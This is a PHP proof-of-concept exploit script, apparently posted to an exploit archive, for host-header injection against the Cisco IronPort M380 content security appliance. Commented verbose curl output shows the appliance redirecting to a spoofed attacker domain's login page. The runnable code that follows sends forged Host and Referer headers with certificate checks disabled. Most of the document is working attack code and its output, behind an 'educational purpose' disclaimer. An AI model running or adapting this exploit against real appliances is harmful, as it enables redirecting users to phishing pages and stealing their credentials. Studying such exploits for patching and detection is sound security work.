Share
<?php  
//  
// Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit  
//  
//  
// Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>  
//  
//  
// Disclaimer:  
// This or previous programs are for Educational purpose ONLY. Do not use it without permission.   
// The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages   
// caused by direct or indirect use of the information or functionality provided by these programs.   
// The author or any Internet provider bears NO responsibility for content or misuse of these programs   
// or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,   
// system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's   
// responsibility.  
//   
// Use them at your own risk!  
//  
//  
// [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php  
// PHP <HIDDEN> Development Server started at Sun Sep 8 16:47:43 2019  
// Listening on http://localhost:1337  
// Document root is /home/test/ironport  
// Press Ctrl-C to quit.  
// * About to connect() to 192.168.1.1 port 443 (#0)  
// * Trying 192.168.1.1... * connected  
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)  
// * Initializing NSS with certpath: sql:/etc/pki/nssdb  
// * skipping SSL peer certificate verification  
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256  
// * Server certificate:  
// * subject:   
// * start date: Mar 19 00:00:00 2018 GMT  
// * expire date: Mar 18 23:59:59 2020 GMT  
// * common name:   
// * issuer:   
// > GET / HTTP/1.1  
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
// Cache-Control: no-cache  
// Content-Type: application/x-www-form-urlencoded; charset=utf-8  
// Host: scam-page.com  
// Referer: scam-page.com  
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0  
//   
// * HTTP 1.0, assume close after body  
// < HTTP/1.0 303 Redirecting  
// < Server: glass/1.0 Python/2.6.4  
// < Date: Sun, 08 Sep 2019 13:47:59 GMT  
// < Content-Type: text/html  
// < X-Frame-Options: SAMEORIGIN  
// < Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure  
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0  
// < Pragma: no-cache  
// < Expires: Sun, 08 Sep 2019 13:47:59 GMT  
// < Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT  
// < Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch  
// <   
// * Closing connection #0  
// * About to connect() to 192.168.1.1 port 443 (#0)  
// * Trying 192.168.1.1... * connected  
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)  
// * skipping SSL peer certificate verification  
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256  
// * Server certificate:  
// * subject:   
// * start date: Mar 19 00:00:00 2018 GMT  
// * expire date: Mar 18 23:59:59 2020 GMT  
// * common name:   
// * issuer:   
// > GET / HTTP/1.1  
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
// Cache-Control: no-cache  
// Content-Type: application/x-www-form-urlencoded; charset=utf-8  
// Host: scam-page.com  
// Referer: scam-page.com  
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0  
//   
// * HTTP 1.0, assume close after body  
// < HTTP/1.0 303 Redirecting  
// < Server: glass/1.0 Python/2.6.4  
// < Date: Sun, 08 Sep 2019 13:48:00 GMT  
// < Content-Type: text/html  
// < X-Frame-Options: SAMEORIGIN  
// < Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure  
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0  
// < Pragma: no-cache  
// < Expires: Sun, 08 Sep 2019 13:48:00 GMT  
// < Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT  
// < Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch  
// <   
// * Closing connection #0  
//   
  
  
$url = "https://192.168.1.1";  
$fake_host = "scam-page.com";  
$ch = curl_init();   
  
curl_setopt($ch, CURLOPT_URL, $url);   
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);  
curl_setopt($ch, CURLOPT_VERBOSE, true);  
$headers = [  
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',  
'Cache-Control: public',  
'Content-Type: application/x-www-form-urlencoded; charset=utf-8',  
'Host: '.$fake_host,  
'Referer: '.$fake_host,   
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',  
];  
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  
$output = curl_exec($ch);   
curl_close($ch);  
echo $output;